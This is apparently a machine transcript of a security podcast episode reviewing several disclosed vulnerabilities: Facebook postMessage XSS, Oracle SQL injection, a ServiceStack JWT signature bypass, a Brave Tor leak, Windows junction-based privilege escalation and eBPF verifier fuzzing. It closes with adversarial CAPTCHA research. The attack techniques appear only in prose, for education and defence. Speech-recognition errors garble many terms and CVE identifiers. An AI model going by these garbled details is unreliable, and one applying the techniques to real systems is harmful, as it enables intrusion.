post. But this one definitely kind of got a little bit far roundabout way the first issue that they found so there are two bugs that God changed. Get cross-site scripting the first bug just allowed an attacker to send postmessage from the face. Well from our daughter in their case. They use our DOT Alpha Del facebook.com, but essentially from a facebook.com domain or subdomain. I think they originally found the issue such that was targeting our DOT intern to facebook.com. But anyway, they had this payments redirect page like Facebook home payments redirect our PHP what they found was if you change the type parameter just from I to r p they might been Brute Force. They don't actually say how they found that but it would create a post message to send a message to the window door opener. So post message if you're not familiar just a way of sending.
You are kind
So I think out of all the cross site scripting issues, we've covered lately. This one was probably the most difficult for me to wrap my head around probably because I'm not really familiar with that postmessage API that you were talking about earlier. But yeah, I mean, this is an issue that's hitting Facebook and Facebook was quick to turn around on this. I think the in covered this issue on October 10th, and it was fixed October 28th, and they paid a $20,000 Bounty. So Facebook's been known. To pay be simply well for for issues. So if you're looking for somewhere to look Facebook might be might be an idea. But yeah, this issue was was tough for me to wrap my head around. So thank you for explaining it there because you cleared up some of the points that I was confused on
it. Yeah, it's definitely it's a little bit of roundabout because it does have that extra layer of the attack where they have the two bugs being chained the one bug giving you the post message in them. Finding somewhere that trust that post message which definitely adds to complexity. We have covered a I don't know if it was exactly the same as this but we have covered another attack that abused the post message. That was a google-wide like it did this domain check it make sure it was only sorry. I was just looking it up here. So this is on episode 33 the unexpected Google y domain bypass where Google had it would generate API Keys like when you're using the API documentation, you can click a button to open and I frame it would communicate API key back over the Post message so they were able to bypass one of the checks there. So just another issue kind of taking advantage of the post message because there is kind of that trust that if you're able to violate that trust there usually are further issues. So just want to call that one else that the one episode 33 was also a little bit complicated to get through but definitely kind of worth giving it a read.
Your memory is way too good. I'm jealous. I totally forgot about that issue. So that's that's a good on you that you were able to remember that
it's artificial memory. I have it written down
here. Okay fair enough, so getting into our last SQL injection and excess of the episode. We have a reflective xss and SQL injection the Oracle Communications diameter signaling router CBS are So the reflected xss seems to be present in the grid filter column parameter for one of the pages and the grid filter value parameter for range Base address resolution. So this can be reached from anyone on the network which is notable. It doesn't require authentication or anything like that and that can allow an attacker to hijack a session in order to exploit the more impactful bug which is the SQL injection. This was in the admin panel endpoint for listening systems. Did through the simple Network management protocol and it was a Boolean base blind SQL. I threw the scope parameter. So in terms of timeline, it was reported February 14th, and then all the way through the year to October 20th, the critical patch update was issued. So this is the longest turned around time we've had in the episode and maybe in the last couple episodes that that's that's quite a while to fix the issue, but it did eventually get fixed. But yeah, it seems like they were decently straightforward issues. Unlike the last one. There was no like super roundabout way to reach these ones. It was just straight up parameters that were exposed in the URL that were passed and they just didn't sanitize them. So
yeah, I mean the blind ones are always a little bit tricky to find an exploit just because well, it's blind you don't have Anything too obvious that you're actually getting a successful hit. In some cases like in this case. It looks like it was pretty straightforward single quote and single bracket Escape them into their arbitrary query. So if you could figure it out from there. But sometimes it can be kind of tricky in this case. It doesn't look like it was that bad worth pointing out like it's a good find especially if this wasn't a white box
assessment. Yeah, now I will say NCC group. We've covered them a lot and they always give really detailed timelines. It is pretty interesting to go to the timeline. You can see all the way through the year until they pass the issue. There was a lot of automatic status updates under investigation and then issue addressed in the main code line. Like it's funny how much detail they provide here. When really it's just Oracle saying don't worry. We know we're fixing it the a lot of redundant details in the timeline, but you know fair enough NCC group has always been more verbose when it comes to reporting the timeline, which is which definitely isn't a bad thing. Just gave me a bit of a chuckle when I was looking at it. Yeah, the issue itself fairly straightforward not too much to talk about there. Our next pose is rediscovering a JWT authentication bypass and service stack. So this is a PSA type post from a pen testing company called shielder and it talks about how they ended up discovering a previously reported or fixed JWT authentication bypass in service stack on an assessment. So unlike most of the exploits that we cover this one was already patched. Essentially, they tried to bypass a third-party off service the web app was using which utilize JWT tokens and they discovered when you remove the signature from the token. They got a 200 OK response back instead of an error response, which is really strange and basically tip them off that there was a big problem here.
It's actually I won't say it's that strange actually this one. It's basically your no signature. She'll get it should be less common than it is. You'd wish it is but it's definitely not that unheard-of huge issue one of probably one of the most common things that even see if I assess something dealing with JWT is just not caring but whether or not it's signed and of course if it's not signed you can modify and do whatever the heck you want with
it. Yeah, and the reasoning for it like you said there was no length check on the signature check. It just did a straight-up compare. So when you're comparing 0 bytes, it's always going to succeed and we've seen this exact type of issue before I can't remember exactly what we were covering. But this code pattern is it seems to be like a really common code pattern which is really silly but it's just one of those things that people seem to overlook. So how they ended up discovering the details and root causing the issue was after some Recon they discovered they were using the service stack Library which is you know, open source and they were able to look into the source code and find that issue now like I was saying earlier this issue was already fixed by service stack in August and they found that this was weird because the customer that they were assessing seem to be very Vigilant when it came to third-party libraries and keeping them patched and yeah, they said no, No other dependency had known vulnerabilities and it seemed they paid attention to security advisories. The problem here seem to be there was no advisory or impact given for this issue. It was just kind of silently fixed by service stack. So that was the reason they put out this blog post, even though the issue was already fixed. It wasn't like a zero-day they discovered or anything. They wanted to get an advisor created and a CDE assigned that way others also have that advisory to go off of so that more companies don't end up getting Guided by this basically, which I think was a cool move on their part. They didn't have to do that. Obviously. It is good PR but still like they weren't obligated to do that. So I think that's that's good on this this pen testing company. But yeah, really unfortunate that these silly no length checks are as prevalent as they are. If you're comparing something make sure to actually check that there's something to compare against or else you're going to open yourself up to issues.
Yeah, so mean, I do want to kind of call out here that service stack definitely downplayed. This issue. I just pulled up the release notes. And I believe I'm trying to find exactly where they were talking about it. Yeah. So if you're using JWT oath, please upgrade to v59 to when possible to resolve JWT signature verification issue. That's the only warning that they gave about this which I would argue this sort of issue does kind of warned a more significant warning when it's literally a complete authentication bypass.
Yeah, I'd agree that that's definitely downplaying and I just happen to be
well, this was why their client hadn't updated is because the patch notes didn't really indicate that they that it was a huge issue. So I do just want to call that out from service stack like that's You should be clear about your vulnerabilities.
Yeah, especially when you're being used as a third-party library and things right? Like that's that's part of your I guess duty to people who are using your stuff. So yeah. Okay. I think that's fair to call the no. No, I'm not up next is a vulnerability in the brave browsers tour implementation now, I didn't know this but apparently in 2018 Brave integrated tour sessions into No, which is kind of cool and I'm surprised I've never heard about that. But I've just never really been a somebody that's really ingrained into Brave or anything like that. But the issue comes down to the fact that brave has a referral Rewards program. So they commonly use this for crypto sponsored backgrounds and referral links to crypto trading websites. So among some of their Partners I think our coinbase Softonic and market watch that were some of the examples that they listed that were part of that program so you can see in the code. Code snippet that they provide their they have an x-ray partner header in the in the referral header. So and this header is sent even if you're browsing with poor, by the way, on top of that there's also a local data data store for this referral program, which includes sensitive information about Tor browsing sessions and this data doesn't get white after the session is terminated. So some of the data that's included in that local local store is the referral attempt to count timestamp and whether or not or was used when Using it so pretty like compromising information. If someone can get ahold of that private data store. And now that issue was fixed. I believe the local store is actually clear now, although yeah, it wasn't
clear if they still send that
header or not. I was trying to see if they also don't send that anymore. But I they disobey talk about that. So
it seems like that header shouldn't have been sent when in incognito mode at all. So I don't believe they'd still be sending it. Okay, I'm not sure if they specifically call that out. But that seemed to be the gist that you got when looking at the emails that they heard the messages they had back and forth as for the information that actually gets linked made does require kind of local access to be able to pull that folder. So that's when it's sent out to Brave. It's bucketed into like did they use it in the last 24 hours or last week or 28 days or ever like it's just kind of bucketed into that it Give a lot of information but as they do point out if you were if you were say civil rights activist using Tor for something and got raided by the police, you know, they'd be taxes that timestamp they could correlate that with time stamps from like your ISP to be able to do know that K you were using Tor at exactly this time like to the millisecond. Select definitely some issues with that but it does require that local access for that particular part of the leek. Obviously the header is an isn't that same issue? Like these are multiple issues here, but for that one, it did require local local
access. Yeah, even though it requires a high degree of access. It is basically in tours threat model. So
oh for sure. Yeah knowing that was They mention that that wasn't something intended to do their intent and what how they fix that was. They logged Incognito usage within up doing was logging every Incognito usage which includes tour but they only want to do it was like the Nantes War one. So what they ended up doing was only logging in for non tour and they end up deleting things afterwards,
too. Yeah, so the authors do give credit to Brave for being clear with communication and being open to the issues as well as having a quick turnaround. So that's cool to see it was fixed within a few days. I will say I don't know how I feel about that that referral Rewards program and brave because it sounds like it's not like a opt-in. It sounds like it's an opt-out like as soon as you install Brave and use it. This is already happening in the background which I mean I don't know how I feel about that. I feel like that is kind of I don't know stealthy. I guess I don't know what your thoughts are on that zi. Like do you think that's fair that they do
that? I was thinking about it a little bit. It is a small set of specific Brave partner websites that it's basically announcing. Hey, this person uses Brave, it does feel a little bit of medical to Rave themselves. Like they're kind of like anti tracking itself. So it does feel a little weird. It is a way that they're making some money. It is just a limited number of sites. Although I do see like Softonic and I'm not a fan of Softonic.
I feel like I haven't even heard of Softonic in years.
Yeah, because everybody same saying yeah. Like I actually I'm just opening up in another window to make sure it's the website. I think it is because it's been so long that they just have like such a bad reputation though.
Yeah. I've seen some software that's used and I'm like, oh no, they're a mirror that I can use someone else
pretty much. Um, I would say that brave kind of This does feel a little bit Shady from them. I can kind of understand it. It's definitely a limited impact its announcing you're using Brave to a small set of website, but it still feels pretty shady. Especially since the only reason to do that is effectively for tracking purposes. Like I can't imagine any other reason why they would want that. Like I can't come up with like a charitable explanation may be brave will put out a statement about it. But I don't know it does feel. Often actually looking at this picture here. There are quite a few domains.
That I don't like coin basis stuff. We're just the headlining ones. It seems like there was like a more extensive list. So yeah. Yeah, I found that to be a little bit Shady but we'll give them credit where credit is due at least they did fix this issue and they were they were quick to to address it. So yeah, it was fixed within a few days. I think the author even said if it wasn't reported before weekend, they think it probably would have been fix the same day. So that's cool.
Yeah, I mean it was a good response. I have mixed feelings about Brave and general. I do use Brave. It's my mobile browser.
So brave that introduced that that token system.
Yes the tension token. Oh, yeah, that's what they they took a lot of heat for it because Tom Scott didn't seem to understand that his picture was the fav icon for his website. So he made a big deal about them creating this spoofing page asking for donations and using his picture when it was using the favicon of his website as like the picture Choate. He took a lot of heat over that but yeah, bro, Was browser and they deaf Brave definitely did some things wrong with that to I'm not not shifting all the blame, but it was really just because 1e celebrity we've got worked up
over it. Yeah that said I think we can move on to a post from ioactive which talks about a privilege escalation of Windows through the Microsoft store. So this focuses on the ability to facilitate moddable games. So for those who haven't played many awesome video games that support modding some PC games allow you to use like mod tools or what have you to add custom functionality to a game adding to its extendibility. So an example the probably almost everyone has heard of is mine. Right. There's there's some Minecraft plug-in system. For example now because Windows apps are usually put into read only restricted directories model model games need an exception to allow the installation files to be modified for installing mods to do that. They create a directory specifically for that purpose called modifiable Windows apps now because of that powerful capability Microsoft does limit the ability to have your game as a model game to a whitelisted. Set of games that are pre-approved by Microsoft. So the researchers at ioactive chose to Target a game that supported this capability going with one called faster than light, which is Some Space strategy game. They initially attempted to use Junctions in the installer directory to be able to install games to an arbitrary directory that initially didn't work though because users don't have the permission to replace the modifiable Windows apps directory and access to the subconscious. Intense is restricted. They discovered though the windows provides a feature that allows you to specify where new apps and documents saved to by default through the control panel presumably so that people can install games and stuff to a different Drive other than the C drive which makes sense from a convenience point of view.
Yeah, and this is the same thing that you use for like your library. So like when you click documents or videos, you can point that to any folder when it comes to this like it's just asking for your I've in this case, but it's the same feature. You can tell it where it should store certain things.
Yeah, the problem was when they found that they change to a different Drive other than the C drive those permissions were much less restricted for some reason and users managed to gain access to the modifiable Windows apps directory. So then they could go back to that original attack. They tried to pull off which was turning the game directory into a junction to make the installer. Rate on an arbitrary arbitrary directory so initially they use that to basically facilitate an arbitrary directory White Primitive. They would cause the installation to fail and which would cause the game files to get wiped and they use the two Junctions so that when the game data is deleted it wipes the directory, you set the Junction's point to they then use the installation feature with the same trick to get arbitrary file, right? And that's how the escalation of privilege comes into play. At the bottom of the post they have a POC for how they did that. I think they have a yeah, they have like a little gift showing what they did. I thought this was an interesting Vector. I haven't really heard of Microsoft Store being targeted in this way before so I think that was kind of interesting and where this blog post brings some unique insights to the table at the same time though. This is yet another Junction or symlink based attack the seams.
These are just never going away. This one differs a little bit though, because this isn't the RPC control Vector from James for Shaw. This is actually just making a directory Junction. And as out of chap, my friend Mansions are ass Junctions can be created without hype ribs. My understanding was that know you couldn't do these Junctions without having the Privileges for it that that RPC control was kind of the trick to get away with it, but it looks like I'll a Out of here is just straight up using The Junction's now I could I might be mistaken here. Like I said, they're definitely presenting this as though creating. The junction is something you can do from just the standard user account. That's definitely the presentation of this article. So I'm kind of going to roll with that but I do have the same question my frie I did. I thought that this was some that did require higher Privileges and it's something I'll have to look into a little bit further. I must see, you know offhand Specter.
No, I don't I will quickly pull out a chat though. Somebody asked Junction. What is a junction for those listening who aren't familiar with Windows terminology because Microsoft does just like to rename things for no reason a junction is basically a symlink. It's the windows equivalent of the seem like they are a little bit different and I think there are like different types of Junctions. It gets really unnecessarily convoluted as is Microsoft's Way, but for all intensive purposes. It is basically a symlink. So those familiar with Linux and operative windows that might help you understand the issue a little bit more here. But yeah, this this is just another example of how the siblings injunctions can be leveraged to do some damage. And
yeah, yeah that's being used in this context though. I really liked this the double Junction for getting the delete to happen. By using a pivot Junction so that it will see the sensitive folder kind of like underneath something that you control or some that you point it to I did like that sort of double Junction attack. I haven't really seen that before kind of makes intuitive sense when you think about how the attacks working and everything, but yeah, how anti - II do have the questions about the Privileges but That was kind of like a different perspective very different take on it, I
guess. Yeah, I think that double Junction trick is one of those things where it's it's not necessarily new but it's new. It was new to me and I'm guessing new to you as well based on the way you're speaking of it. So yeah some interesting insights out of this post,
although one thing that is maybe I just didn't read it, but they managed to spawn a anti Authority / system shell. Using this, but they only talk about basically just replacing files like deleting files and modify like having it right somewhere else, but they end off with the elevation times section and they don't really talk about how they weaponize this.
Yeah, I'm guessing it was a dll hijack. But yeah, it would have been nice to have
that kind of comes down. I guess they don't maybe explain exactly how How it gets the files that's put over like what control you have over what it's over I can see I guess if you could just include a new installation file, it's a dll pointed to a right into like system 32 or something then yeah, you could easily Elevate. Yeah. I just feel like they probably could've included a few details to make that a bit more clear that does seem like there should be the obvious attack Vector, especially since he mentioned doing a deal over. I like that's pretty obvious specter. It just feels like they probably have included some details to that.
Yeah, I feel like that is the most likely like the strategy that you laid out there just because if that was their strategy I could see why they might not want to include that in the post. They might see that as something that is obvious or at least obvious to them. So they just didn't want to add what they would see is filler to the post that said I agree. I think they probably should have included at least like a maybe a sentence or two. Just mentioning how Bridge that Gap but yeah seems most likely it's a dll hijack. Visiting a favorite set of topics Colonel and fuzzing. We have a topic that touches on fuzzing the extended Berkeley packet filter in Linux kernel, so the bug in this blog post it initially talks about CDE 20 28 35, which was an out-of-bounds access and ppf verifier. We actually talked about this bug in episode 38 of the podcast which you can check out if you're interested in hearing about how that bug works all of our podcasts have time stamp. So you can just check out that bot on YouTube and go to that section if you want to Essentially the commit the tried to address that bug ended up introducing a new one and it was discovered by fuzzing. So while that bug will be interesting to look at first the author goes into methodology around the architecture of the buzzer they wrote. Yes. So as well as some custom bug detection just before you
go into that. I do want to talk a little bit about a BPF out of Chad. It's you know, how does this relate to jit? If you're not familiar with Berkeley pack filter programs. What you're able to write small very constrained programs that will be compiled and executed in the kernel has found its own law instructions there that and also has constraint on those instructions and what they can do to make sure it's going to terminate things like that, but effectively it is like a little bit of a program that gets you just in time compiled and executed in the kernel to run against Network packets coming in. So that's kind of where the jit aspect comes in. It is a little bit weird to have a jit in the kernel and BPF has definitely been an area where there have been vulnerabilities before.
Yeah. It's basically a VM in the kernel which is not a great idea.
Yeah. Well so better way to describe it than what I
did. Yeah. It's why in some operating systems like FreeBSD BPF is privileged sir to root for whatever reason and Linux. It's not because the ability to run custom instructions in a kernel parser. It just opens up so many potential bugs because you're dealing with pointer arithmetic and that gets really tricky to manage when you allow people untrusted people to specify what kind of arithmetic you're doing there and like you said like there's been probably I want to say around like 10 bugs and BPF if I want to be generous so I don't have an exact count but there's been a lot of issues that has spawned over out of ppf. But yeah, like I was saying they get into the fuzzer at first along with some of the background they include some background on the difficulties involved with buzzing BPF specifically and why they didn't use existing Colonel buzzers like since caller. So the two points they mention is that Colonel can be slow when you're dealing dealing with syscalls and context switches and the second point is BPF verifiers are protected by a mutex which makes fuzzing multiple cores difficult because you end up waiting on that mutex or deadlocking with it and they cite that that would be that would scale badly with korres. So the strategy they went with was basically calling kernel functions in user space programs, which is not super new. We've talked about a strategy that's used this before taking kernel drivers. Executing them in user space and then hooking the colonel API functions like K Malik for example, and just substituting it with a userland Malik in terms of architecture of how the father works. It's actually very similar to Sis caller. It has a manager and worker VMS that work under it and report back up to it when I thought was unique and interesting though was the bug detection part because they cited the fact that it corruption didn't trigger a crash. It probably wouldn't get detected and basically Lee what they did here was they did a bit of a tank check they wrote a random value into a mapping where a right should have occurred and then checked if the BPF filter over rope that value and then use that as an oracle to determine if the pointer arithmetic checked out or if it didn't if that value is overwritten the pointer arithmetic was fine, if it wasn't overwritten, then there was corruption there. So from there they basically did generation based fuzzing with templates getting into the bug which is CV. 20:28 2270 194 the bug I mentioned earlier that was fixed earlier. This year was essentially an issue which was falsely deriving a 32-bit value from a 64-bit register when performing range tracking. I'm not going to go too much into the details of that bug because like I said, we did cover it before but how they attempted to fix this issue was they just extended the range tracking by pulling out 32-bit variance into their own functions and Fields in the verifier structure. To handle them separately. So before they tried to handle both 64-bit and 32-bit values in the same paths now, they try to separate that out to handle them separately. So how they did that was they wrote new functions to handle the 32-bit variants and they it seems they basically just copy and pasted the original ones and changed the pace of ones for 32-bit problem is one of the functions broke that pattern and the 32-bit variant actually wrote the 64-bit. I use into 32 bit fields, which you can see why that would be an issue when it comes to overflows and truncations and whatnot. And this was the scalar 32 min max or function. So yeah, like I said, it seems they just copy and pasted the original functions and this bug was a result of a copy-paste are they just forgot to change the the width of those fields in that function. So the fix for this was very straightforward. They just fix it. So the function uses 32-bit values instead of 64-bit values. I like this blog post and I thought the bug was pretty funny. It's always fun. See those copy/paste derived errors. You think after the first bug they'd go through and try to test for these kinds of issues because those copy paste errors are so easy to make but obviously they didn't I
just have somebody to overlook
Yeah, I do have a few questions or points of contention with a blog post though for one thing. So when they were citing the background of why they chose to write their own buzzer instead of using existing ones. They send that BPF verifiers are protected by a new tax and thus are not scalable. I mean you can still scale you would just run multiple VMS that are hitting the verifier in parallel and then just isolate each core to a VM, which is exactly what he did. You can do that with says caller. So I'm not really sure on that point of like being a valid point of why not to use this color.
Well, but this is caller you're generally going to want to run multiple programs at the same time to which you wouldn't be able to do with the mutex holding yet. You would want to do that, but you
can configure it not to and which is what essentially do the same thing. He did with more effort. So I think that's why I'm trying to think of why they wouldn't just configures his collar.
Yeah one question from I fried this is caller fuzz this part of the kernel. I don't think there are any descriptions right now. That'll hit BPF, but you should be able to what would you want to do you want to add this wouldn't be just straight up descriptions to fuzz this you'd probably have to wrap
it. Yeah, he probably need the pseudocyst
calls actually do it, but you could get some coverage in here. I'm not sure if syscall or would really be the right option. For fussing BPF.
KFL probably would have been a better option. Yeah,
the Yaks, I mean says colors obviously really folks around the syscalls So the other thing that I
wanted to touch on was the custom bug detection solution. So like I said, I thought it was neat and a clever solution. I'm also not entirely sure all that effort was necessary though, because with Linux kernel you have the source code and he's running this in like he's compiling it and running it in userland. They should have been able to compile this with ass and instrumentation, which should have been able to catch the issues that they were trying to solve. I'm not sure why they didn't just compile it with a sand there might have maybe there's some challenges there that they tried to do that and they just didn't list that in the blog post, which if that's the case fair enough, but that's just something that ran through my mind while I was reading it as why not just use the existing instrumentation that already exists right that that instrumentation is provided by the compiler for you. It's it doesn't really require a lot of extra effort to use so it does seem clear that they didn't leverage that. I'm not sure
how I a saint would work if you're like doing the usual hooking on like a elk and stuff. I'm not sure if just the difference in how the alligators of work would also cause problems with a sin. That would be a possibility. They don't discuss it at all. So we're only left to
speculate. Yeah. I wish they kind of went into the insights on that because I feel like I would have been in like an obvious path to take so there probably was challenges they hit that they just didn't lay out
but also like performance would be another case. They do have a fairly simple bug detection here like a very quick check. They don't need to instrument everything and like go through all of that. So I can kind of see that being another case. They're getting more iterations out
effect. Yeah, the final point of contention I had was I'm not super sold on the buzzing kernel code is too slow angle. They mentioned the syscalls and context which is stuff like that and how that would slow down fuzzing for sure context switches do have a cost but is the performance benefit really worth all that effort of like implementing and user land having to hook all those currently API functions and then also potentially losing Asian like we just talked about supporting to the author
and is you do the hooking once and then you should be able to reuse those hooks on other applications to go to other code being pulled out of the colonel. So this kind of comes down to the value of what we kind of talked about before is micro fussing, you know, when you pull out specific functions to do I'm going to say like if assuming you have a just you've written out here Central Library to hook those kernel functions and you're able to easily do this. Like it. Actually it speeds things up quite a bit to not need to hit the kernel at all. Like you're definitely getting more iterations and you can definitely debate whether or not more iterations is actually the the right metric to focus on but you can't deny that more organizations more tests in theory the ability to get more coverage quicker. I'd have to say that it probably is a worth it to pull some things out of the kernel and fuzz them and userland if you're able to get significant speed ups, but you do kind of need these systems that are fairly isolated that just kind of stand on their own.
Yeah, I mean I was going to say that is the problem with this type of approach. It's not really scalable. If you're using a driver or if you're looking to Target a driver that uses a lot of Colonel API functions, like think about it, like some of these drivers you could potentially have to hook like hundreds of functions and at that point, it just doesn't seem like it's worth the benefit
if you freak no library that just hooks the entire kernel effectively. I mean that would take quite a bit of time and
everything feel a lot of work,
but you do that once and Worked for everything
now. Pulling in a chat. Why wouldn't it be scalable why I'm saying it wouldn't be scalable is the amount of manual overhead involved in Hocking all those functions increases like a lot when you're looking at different
subsystems of yeah, and you're talking about kind of like the human scalability aspect of it not it wouldn't be scalable in terms of execution time. Like executing across multiple
cores. Yeah, exactly the human aspect. Now what I would have wished this post included, Cited this performance angle and why they wanted to fuzzy userland. I wish there were stats to back that up because I feel like there could be a perceived bias there. Right? Like if you're running it and userland and you're like, oh this seems to be faster. But especially when you're talking about Colonel, there's so many things that could be impacting performance that one like there's a lot of variance that could be introduced like it could run even faster. There could have just been something running at the same time as your thing was running when you measured Word. So that's why I wish there was more stats that we could look at the kind of get some insights there. But obviously I think they didn't feel the need to include that so that's that's fair. I
guess I think once that is just the look the fact that user line programs are sick have significantly more iterations than like says caller gets his calls. I think that would be kind of want the office case now technically you can definitely argue that that's a bit of an apples to oranges comparison. They're just not the same thing you're you know, This case you're still pulling out kernel code, but like there is at least what seems to be an intuitive understanding that user land programs are faster.
I will wrap up this blog post by saying I did really like it. I think this there's a lot of useful insights here, especially on the buzzing side of things.
Yeah. I enjoyed the read about with like his process for the fuzzer. I thought that was
interesting. And it's another example of a bug that was fixed but wasn't fixed properly, you know, another one of those, you know adages that just because they tried to fix something or they issued a patch doesn't mean that it was patch correctly and this father and this blog post demonstrates that and another point in the favor of BPF is just really damn hard to properly verify and secure. There's so many edge cases that Hard to really keep them all in your mind when you're writing the code for BPF and the types of operations is supports which is just another example of why I'm not really sure why it's exposed to unplug the unprivileged users or why it's even in the kernel at all, but that's a different debate maybe for a different time. But with that said, I think we can move into our research which is our last topic of the episode. So capture the bots. So this is using adversary. So examples to improve captcha robustness to bought a tax. So this is a little bit different today for a research section. It's not something that's buzzing or vulnerability research or exploit Dev related. This one is about improving captchas to be easy for humans to solve but robust against bots this year. Especially we're seeing the need arise for such advancements. The automated scalping that's happened with Meiji major PC part launches this year. Nvidia has been kind of off the charts and Thing this paper points out is that's only going to get worse if things stay as they are so deep learning is advancing. They notice even surpassed humans when it comes to some tasks like image and speech recognition, which are the most common things that are used for captchas right the ability to parse an image and you know, put the characters or whatever that it's displaying so their paper introduces a new technique called capture which stands for captcha technique uniquely resistant. I'm not sure why they needed the Glee in there seems like something they just needed a filler word to be able to spell out a real word. But whatever the basis of it though seems to be the idea of using adversarial perturbations to throw off machine learning. So adding frequency domain perturbations in the captcha that are mostly invisible to humans or humans aren't really going to care about but it's going to mess with the classifiers bots. So how they generate these adversarial images is by combining two techniques. These evolutionary algorithms which is basically a technical implementation of natural selection and the use that to generate samples that fool deep neural networks into thinking that they recognize an image with 99% certainty that they could recognize the image and make sense of it when really the image is basically just garbage and they take that image and they encode it into the image that they show for the captcha the second technique that they use is leveraging. an adversarial patches, which is a common technique of fooling classifiers, especially earlier on early on in the year when we covered a lot of deep learning based papers adversarial patches were Probably the most common technique that we saw and covered on on the podcast. So the idea of adversarial patches as you just overlay a patch over the image and the classifier uses the information from that patch where it should be discarding it it treats it as more important than it actually is and that can throw off the classifier. So they combine these two techniques to arise their main. Product which is the capture the capture idea. So on page 11, I think it's figure 3. I'm just going to scroll down to it. You can kind of see the results of their research so you can see the images. They have those patches the little circles that are overlaying it when a human sees that they're just going to disregard it. They're not going to pay any attention to it and you can see there's some distortions and some of the images as well. And they see when they looked at the evaluation. They did a survey of a hundred and thirteen people with these types of captchas and ask them to solve 10 capture challenges and overall human solved it with an 85 percent success rate and it had a 92 percent success rate against bots and they stated that humans the people who took the survey. So now this is
actually ER that's 92% like Bots failed at 92% of the time. Yeah, just 92 percent success rate
exceeds 90% of the
yeah sounds like Bots are doing better than the humans were.
Yeah, but one thing that was interesting that I wanted to call out is the human participants in the survey said they like this capture more than some of the existing ones because some of the images were just so different from what the captain was asking for that they could immediately disregard them so they were able to solve them a little bit faster. So that was kind of interesting point to call out another thing. I found interesting in their evaluation section, the unrecognizable images encoding on their own seem to have a higher success rate than both techniques combined against the Bots. This was in their usability evaluation. I'll bring it up here now so you can see the success rate unrecognizable images. They had 96.5 and then adversarial patch they at 86 and then combined it. It combined 292. So just using the encoding with the unrecognizable images would have been better against bots. I'm assuming the reason they combined it with the adversarial patch was I guess because it maybe they could tone down the oven recognizable images to make it easier for humans solve. They didn't really seem to talk about this aspect. For some reason. I really wish they did because that discrepancy seemed like something that would have been worth addressing in my opinion. But yeah, I mean that was just that was a weird Quirk that I noticed in their evaluation section overall though. I think it's a cool technique. It's using some of the stuff that we've covered on the podcast before and some of the research we've seen in Academia and putting it to good use that we could really use going forward because that the bot situation was scalping is not going to get any better as we've seen.
Yeah. I've seen this paper. I think you're just about to Fission to pretty much because of my history. Oh, yeah. I kind of got off my star with a lot of programming actually and doing capture breaking now. This was back like 2003-2004 where It captures were a lot simpler. It was more of an OCR problem just recognizing characters. But I also spent a lot of time with my first kind of development job part of what I did was trying to catch Bots and some of that was creating traps for bots. So I kind of like this because it Harkens back to
that sort of anti
cheat style. So I was working on a game at the time and doing some anti. a cheat Development but a lot of what I did was trying to find these little quirks and how the boss would work in order to detect the humans and people are humans and Bots apart. So this I don't know I like this paper just because it Harkens back to that approach rather than just making it harder and harder to read finding other things that just trip the bots off because it's either unexpected. They're not trying to gain set and things like that. So I just want to kind of give a shout out to that Eric's. I don't think that gets enough research. And that's where you start getting easier captors to solve that tend to have that are also easier for humans harder for Bots to deal with
This is one of the very few practical applications. I've seen of the adversarial deep neural network attacks that we've covered because we used to cover a lot of these types of adversarial poisoning based attacks. And while they were cool they were kind of contrived and they didn't really seem like they could practically be applied anywhere like there were flow like they were fooling like classifiers for like security cameras and stuff like that, but it was very obvious. Obvious that there was like somebody would have to wear like an LED strip or something like very obvious to somebody who would actually be in the room. For example, the inverter cement or practical applications.
The real impractical one to me. I'm reminded of is there was one where you had kind of like the person tracking as they would walk by so you would have to set up a TV to play a particular particular image so that when you walked by it the tracking with think that You were still on the TV or whatever like it would end up tracking that image and like you walk away. It's like, yep. You've got a carry in a TV. Nobody's going to notice this position it just right against the camera and all that. Oh, Yeah, I don't know that's when he talked about the impracticality of some of them. That's the one that comes to mind